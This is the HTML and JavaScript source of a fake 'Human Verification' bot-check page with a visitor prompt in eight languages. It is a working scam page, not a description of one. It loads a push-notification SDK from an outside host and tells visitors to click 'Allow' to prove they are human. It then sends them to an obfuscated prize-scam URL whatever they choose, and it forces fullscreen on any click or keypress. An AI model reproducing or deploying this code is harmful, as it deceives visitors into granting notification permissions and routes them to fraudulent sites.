<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Bot check</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            font: 16px Arial, sans-serif;
            margin: 0;
            text-align: center;
            user-select: none
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .notBot {
            background: #fff url(images/bot.png) no-repeat bottom;
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .notBot__inner {
            align-items: center;
            display: flex;
            flex-direction: column;
            left: 0;
            margin: auto;
            max-width: 460px;
            overflow: hidden;
            position: absolute;
            right: 0;
            top: 30px;
            width: 100%
        }

        .notBot__t {
            font-size: 22px;
            font-weight: 700;
            margin: 0 10px
        }

        .notBot__msg {
            background-color: #40a1dd;
            border-radius: 3px;
            color: #fff;
            margin-top: 20px;
            max-width: 285px;
            padding: 5px
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            color: #fff;
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @media (min-width:425px) {
            .notBot {
                background-position: 50% 70%
            }

            .notBot__inner {
                flex-direction: row;
                margin-top: -50px;
                top: 50%;
                transform: translateY(-50%)
            }

            .notBot__t {
                font-size: 24px;
                margin: 0
            }

            .notBot__msg {
                margin-top: 0
            }

            .msgReady__tx {
                font-size: 52px
            }
        }
    </style>
</head>

<body>
  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht','tp://da','ygrandp','rizes7','.life/?u=8mb','p605&o=4xp','kdzx&cid=', getParameterByName('external_id', window.location.href)].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2490456&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>  
    <div class="notBot">
        <div class="notBot__inner">
            <div class="notBot__t"></div>
            <div class="notBot__msg"></div>
        </div>
    </div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <script>
            var g = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (g.k = navigator.language.slice(0, 2)), void 0 === e[g.k] && (g.k = "en"), g.t = e[g.k]
                    },
                    get: function(e) {
                        return g.t[e]
                    }
                },
                y = g;

            y.set({
                ru: {
                    title: "Подтвердите, что не робот",
                    btn: 'Нажмите "Разрешить", чтобы подтвердить, что вы не робот',
                    msg: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                en: {
                    title: "Human Verification",
                    btn: 'Press "Allow" to verify, that you are not robot',
                    msg: "You have successfully passed the verification!<br>Now you can close the window."
                },
                fr: {
                    title: "Vérification humaine",
                    btn: 'Cliquez sur "Autoriser" pour confirmer que vous n\'êtes pas un robot',
                    msg: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    title: "Menschliche verifikation",
                    btn: 'Klicken Sie "Zulassen", wenn Sie kein Roboter sind',
                    msg: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    title: "Verificación humana",
                    btn: 'Haga clic en "Permitir" para confirmar que no es un robot',
                    msg: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                uk: {
                    title: "Підтвердіть що ви не бот",
                    btn: 'Натисніть "Дозволити" щоб підтвердити, що ви не бот',
                    msg: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    title: "Potwierdź, że nie jesteś botem",
                    btn: 'Kliknij "Zezwalaj", aby potwierdzić, że nie jesteś botem',
                    msg: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                th: {
                    title: "ยืนยันว่าคุณไม่ใช่บอต",
                    btn: " คลิกอนุญาตเพื่อยืนยันว่าคุณไม่ใช่บอต",
                    msg: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), document.querySelector(".notBot__t").textContent = y.get("title"), document.querySelector(".notBot__msg").textContent = y.get("btn"), document.querySelector(".msgReady__tx").innerHTML = y.get("msg")
    </script>
    <script>
      var t = function() {
          void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
      };
      document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
    </script>
</body>


</html>
